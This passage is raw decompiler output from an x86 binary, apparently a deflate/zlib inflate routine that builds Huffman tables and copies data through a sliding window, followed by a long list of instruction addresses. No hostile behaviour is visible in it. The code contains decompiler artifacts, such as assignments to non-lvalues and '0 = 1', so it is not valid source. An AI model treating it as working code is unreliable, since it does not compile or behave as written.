							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf0;
												if( *0x42daf0 != 0) {
													L22:
													_t412 =  *0x409364; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409368; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c96c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c968; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c970;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf0;
													if(_t416 < 0x42cdf0) {
														L15:
														__eflags = _t416 - 0x42cbac;
														_t438 = 8;
														if(_t416 > 0x42cbac) {
															__eflags = _t416 - 0x42cd70;
															if(_t416 >= 0x42cd70) {
																__eflags = _t416 - 0x42cdd0;
																if(_t416 < 0x42cdd0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c970, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c970 + _t440;
														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
														 *0x42daf0 =  *0x42daf0 + 1;
														__eflags =  *0x42daf0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                      0x00406043
                                      0x00406043
                                      0x00406043
                                      0x00406043
                                      0x00406043
                                      0x00406047
                                      0x00000000
                                      0x00000000
                                      0x0040604d
                                      0x0040604d
                                      0x00406050
                                      0x00406053
                                      0x00406058
                                      0x0040605a
                                      0x0040605d
                                      0x00406060
                                      0x00406063
                                      0x00406063
                                      0x00406066
                                      0x00000000
                                      0x00000000
                                      0x00406068
                                      0x00406068
                                      0x0040606b
                                      0x00406070
                                      0x00406072
                                      0x00406075
                                      0x0040607b
                                      0x00405dda
                                      0x00405dda
                                      0x00405ddd
                                      0x00405de3
                                      0x00405de9
                                      0x00405df2
                                      0x00405df8
                                      0x00405dfb
                                      0x00405e02
                                      0x00405e07
                                      0x00405e0d
                                      0x00405e18
                                      0x00405e18
                                      0x00406081
                                      0x00406081
                                      0x0040608b
                                      0x00000000
                                      0x00000000
                                      0x00406091
                                      0x00406091
                                      0x00406095
                                      0x00406098
                                      0x00406098
                                      0x0040609c
                                      0x004060a2
                                      0x004060a2
                                      0x004060a5
                                      0x004060a8
                                      0x004060ae
                                      0x00000000
                                      0x00000000
                                      0x004060b0
                                      0x004060d2
                                      0x004060d2
                                      0x004060d5
                                      0x00000000
                                      0x00000000
                                      0x004060b2
                                      0x004060b6
                                      0x00000000
                                      0x00000000
                                      0x004060bc
                                      0x004060bc
                                      0x004060bf
                                      0x004060c2
                                      0x004060c7
                                      0x004060c9
                                      0x004060cc
                                      0x004060cf
                                      0x004060cf
                                      0x004060d7
                                      0x004060d7
                                      0x004060dd
                                      0x004060e0
                                      0x004060e3
                                      0x004060e3
                                      0x004060ea
                                      0x004060ee
                                      0x004060f2
                                      0x004060f5
                                      0x004060f8
                                      0x004060fe
                                      0x00406103
                                      0x00000000
                                      0x00000000
                                      0x00406105
                                      0x00406119
                                      0x00406119
                                      0x0040611d
                                      0x00000000
                                      0x00000000
                                      0x00406107
                                      0x0040610a
                                      0x0040610a
                                      0x00406111
                                      0x00406116
                                      0x00406116
                                      0x00406116
                                      0x0040611f
                                      0x0040611f
                                      0x00406122
                                      0x00406130
                                      0x00406136
                                      0x0040613b
                                      0x00406141
                                      0x00406147
                                      0x0040614d
                                      0x00406154
                                      0x00406168
                                      0x00406168
                                      0x00406737
                                      0x00406737
                                      0x00406737
                                      0x0040673c
                                      0x00000000
                                      0x00000000
                                      0x00405d74
                                      0x00405d74
                                      0x00000000
                                      0x0040636f
                                      0x0040636f
                                      0x00406373
                                      0x00406376
                                      0x00406379
                                      0x0040637c
                                      0x00000000
                                      0x00000000
                                      0x00406382
                                      0x00406382
                                      0x004063a7
                                      0x004063a7
                                      0x004063a7
                                      0x004063a9
                                      0x00000000
                                      0x00000000
                                      0x00406387
                                      0x00406387
                                      0x0040638b
                                      0x00000000
                                      0x00000000
                                      0x00406391
                                      0x00406391
                                      0x00406394
                                      0x00406397
                                      0x0040639a
                                      0x0040639c
                                      0x0040639e
                                      0x004063a1
                                      0x004063a4
                                      0x004063a4
                                      0x004063a4
                                      0x004063ab
                                      0x004063ab
                                      0x004063b3
                                      0x004063b6
                                      0x004063b9
                                      0x004063bc
                                      0x004063c0
                                      0x004063c3
                                      0x004063c5
                                      0x004063c8
                                      0x004063ca
                                      0x004063de
                                      0x004063de
                                      0x004063e1
                                      0x004063fb
                                      0x004063fb
                                      0x004063fe
                                      0x00000000
                                      0x00000000
                                      0x00406404
                                      0x00406404
